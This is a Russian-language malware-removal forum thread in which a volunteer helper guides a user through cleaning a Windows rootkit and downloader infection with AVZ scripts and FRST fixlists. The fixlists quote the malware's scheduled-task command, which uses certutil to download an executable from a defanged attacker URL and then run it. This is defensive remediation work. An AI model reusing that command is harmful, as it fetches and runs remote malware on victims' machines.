Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 23.

Исчезают exe файлы разных программ на разных пк в сети [Rootkit.Win64.Agent.ayv, Trojan-Downloader.Win32.Bandit.vr ] (заявка № 219813)

  1. #1
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54

    Исчезают exe файлы разных программ на разных пк в сети [Rootkit.Win64.Agent.ayv, Trojan-Downloader.Win32.Bandit.vr ]

    Это один из ПК из общей сети. Везде один и тот же вирус, который удаляет файлы *.exe. Где удалил файл для просмотра пдф файлов, где-то ПО для просмотра камер, где-то менеджер лицензий 1с ключа алладин. Где-то стоит каспер где-то нет...он ничего не находит...заранее спасибо за помощь!
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    383
    Уважаемый(ая) Алексей_Азов, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    Выполните скрипт в AVZ из папки Autologger
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
    ExecuteFile('schtasks.exe', '/delete /TN "csrss" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "lsa64" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "MRT" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "ScheduledUpdate" /F', 0, 15000, true);
     QuarantineFile('C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe','');
     SetServiceStart('WinDefender', 4);
     SetServiceStart('Winmon', 4);
     SetServiceStart('WinmonFS', 4);
     SetServiceStart('WinmonProcessMonitor', 4);
     TerminateProcessByName('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe');
     TerminateProcessByName('c:\windows\rss\csrss.exe');
     TerminateProcessByName('c:\users\user\appdata\local\temp\csrss\lsa64.exe');
     TerminateProcessByName('c:\users\user\appdata\local\temp\csrss\mrt.exe');
     TerminateProcessByName('c:\windows\windefender.exe');
     QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','');
     QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys','');
     QuarantineFile('C:\Windows\System32\drivers\Winmon.sys','');
     QuarantineFile('c:\windows\windefender.exe','');
     QuarantineFile('c:\users\user\appdata\local\temp\csrss\mrt.exe','');
     QuarantineFile('c:\users\user\appdata\local\temp\csrss\lsa64.exe','');
     QuarantineFile('c:\windows\rss\csrss.exe','');
     QuarantineFile('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe','');
     DeleteFile('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe','32');
     DeleteFile('c:\windows\rss\csrss.exe','32');
     DeleteFile('c:\users\user\appdata\local\temp\csrss\lsa64.exe','32');
     DeleteFile('c:\users\user\appdata\local\temp\csrss\mrt.exe','32');
     DeleteFile('c:\windows\windefender.exe','32');
     DeleteFile('C:\Windows\System32\drivers\Winmon.sys','32');
     DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys','32');
     DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','32');
     DeleteFile('C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe','32');
     DeleteService('WinmonProcessMonitor');
     DeleteService('WinmonFS');
     DeleteService('Winmon');
     DeleteService('WinDefender');
     RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','PatientShadow');
     RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','CloudNet');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    ExecuteREpair(10); 
    RebootWindows(false);
    end.
    • Обратите внимание: будет выполнена перезагрузка компьютера.


    Выполните скрипт в AVZ
    Код:
    begin
    CreateQurantineArchive('c:\quarantine.zip');
    end.
    c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.

    Скачайте ClearLNK и сохраните архив с утилитой на Рабочем столе.
    1. Распакуйте архив с утилитой в отдельную папку.
    2. Перенесите Check_Browsers_LNK.log из папки Autologger на ClearLNK как показано на рисунке

    3. Отчет о работе ClearLNK-<Дата>.log будет сохранен в папке LOG.
    4. Прикрепите этот отчет к своему следующему сообщению.

    Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к следующему сообщению НОВЫЕ логи.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  5. #4
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    После выполнения скрипта и перезагрузки запустился eset антивирус. Выполнил все дальнейшие действия и всё сделал по инструкции. Спасибо.
    Вложения Вложения

  6. #5
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
    • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
    2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

    3. Нажмите кнопку Scan.
    4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
    5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
    6. Отчеты, полученные в пунктах 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  7. #6
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    все сделал, файлы приложил.
    Вложения Вложения

  8. #7
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    1. Откройте Блокнот и скопируйте в него приведенный ниже текст
    Код:
    CreateRestorePoint:
    HKU\S-1-5-21-663189659-2337478190-1631429109-1000\...\Run: [PatientShadow] => C:\Windows\rss\csrss.exe [3097600 2018-08-02] () <==== ATTENTION
    HKU\S-1-5-21-663189659-2337478190-1631429109-1000\...\Run: [CloudNet] => C:\Users\User\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-08-02] (EpicNet Inc.) <==== ATTENTION
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-07-20] () [File not signed] <==== ATTENTION
    2018-08-02 08:51 - 2018-08-02 08:51 - 000003484 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-08-02 08:51 - 2018-08-02 08:51 - 000003178 _____ C:\Windows\System32\Tasks\csrss
    2018-07-20 15:51 - 2018-08-02 07:48 - 000026688 _____ C:\Users\Все пользователи\appdata.dat
    2018-07-20 15:51 - 2018-08-02 07:48 - 000026688 _____ C:\ProgramData\appdata.dat
    2018-07-20 15:36 - 2018-07-20 15:36 - 000000000 ____D C:\Users\User\AppData\Roaming\EpicNet Inc
    2018-07-20 15:51 - 2018-08-01 17:08 - 000000001 _____ () C:\Users\User\AppData\Roaming\lsa64.log
    C:\Windows\rss\csrss.exe
    C:\Users\User\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    Task: {5D544C52-10F3-4307-80F9-990456DDEA9C} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-08-02] () <==== ATTENTION
    Task: {A46BA8F7-C558-46A8-9EE3-093E192AA578} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe
    Reboot:
    2. Нажмите ФайлСохранить как
    3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
    4. Укажите Тип файлаВсе файлы (*.*)
    5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
    6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
    • Обратите внимание: будет выполнена перезагрузка компьютера.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  9. #8
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    готово...
    Вложения Вложения

  10. #9
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    Что с проблемой?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  11. #10
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    К сожалению проблема сохраняется...переустановили ПО для просмотра видео, спустя несколько часов исполнительный файл *.exe исчез...
    Винда пишет, что ярлык ссылается на не существующую программу.

  12. #11
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    Делайте логи с других машин и прикрепляйте в отдельные темы.

    Сделайте лог МВАМ
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  13. #12
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    Снова перестал запускаться eset. Mbam не запускается, что пишет видно на скрине.
    Изображения Изображения

  14. #13
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    Не запускается MBAM. Eset перестал запускаться снова. Скриншот с ошибкой запуска mbam во вложении.
    Изображения Изображения

  15. #14
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    Новый лог FRST.txt сделайте
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  16. #15
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    готово...
    Вложения Вложения
    • Тип файла: txt FRST.txt (36.5 Кб, 1 просмотров)

  17. #16
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    А зачем присылать старый лог, если я просил сделать новый?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  18. #17
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    переделал...
    Вложения Вложения

  19. #18
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    TeamViewer 12 Host сами устанавливали?

    CloudNet удалите через Установку программ.


    1. Откройте Блокнот и скопируйте в него приведенный ниже текст
    Код:
    CreateRestorePoint:
    HKU\S-1-5-21-663189659-2337478190-1631429109-1000\...\Run: [PatientShadow] => C:\Windows\rss\csrss.exe [3132928 2018-08-06] () <==== ATTENTION
    HKU\S-1-5-21-663189659-2337478190-1631429109-1000\...\Run: [CloudNet] => C:\Users\User\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-08-06] (EpicNet Inc.) <==== ATTENTION
    S2 TeamViewer; "C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe" [X]
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-07-20] () [File not signed] <==== ATTENTION
    2018-08-06 12:30 - 2018-08-06 12:30 - 000000000 ____D C:\Users\User\AppData\Roaming\EpicNet Inc
    2018-08-06 12:29 - 2018-08-06 12:29 - 000003484 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-08-06 12:29 - 2018-08-06 12:29 - 000003178 _____ C:\Windows\System32\Tasks\csrss
    C:\Windows\rss\csrss.exe
    C:\Users\User\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    Task: {3F583F37-E282-463B-AB38-C31FB25AD9CF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-08-06] () <==== ATTENTION
    Task: {64236FFF-4F8E-4035-AC02-5A57D86353BA} - System32\Tasks\MRT => C:\Users\User\AppData\Local\Temp\csrss\mrt.exe [2018-08-02] () <==== ATTENTION
    Task: {BE8FC6A8-C0AE-474F-9F28-78536D06B624} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    C:\Users\User\AppData\Local\Temp\csrss
    Task: {CD1C6A2A-40C8-4D52-88F5-8935A044BEF1} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-08-06] () <==== ATTENTION
    Task: {DB8F8B8A-0AD9-4F17-A334-AD86E82D27C1} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Reboot:
    2. Нажмите ФайлСохранить как
    3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
    4. Укажите Тип файлаВсе файлы (*.*)
    5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
    6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
    • Обратите внимание: будет выполнена перезагрузка компьютера.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  20. #19
    Junior Member Репутация
    Регистрация
    10.10.2010
    Сообщений
    27
    Вес репутации
    54
    Да тим я ставил...во вложении новый лог...
    Вложения Вложения

  21. #20
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3108
    Что с проблемой?

    Я просил Вас заняться и созданием тем с логами других компьютеров в сети, на которых хозяйничают подобные вирусы. Чего ждете-то?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  • Уважаемый(ая) Алексей_Азов, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Ответов: 14
      Последнее сообщение: 15.06.2015, 08:47
    2. Ответов: 2
      Последнее сообщение: 12.03.2013, 05:49
    3. Ответов: 11
      Последнее сообщение: 29.01.2013, 01:10
    4. Ответов: 1
      Последнее сообщение: 20.03.2012, 12:57
    5. Ответов: 4
      Последнее сообщение: 25.11.2009, 20:07

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00586 seconds with 17 queries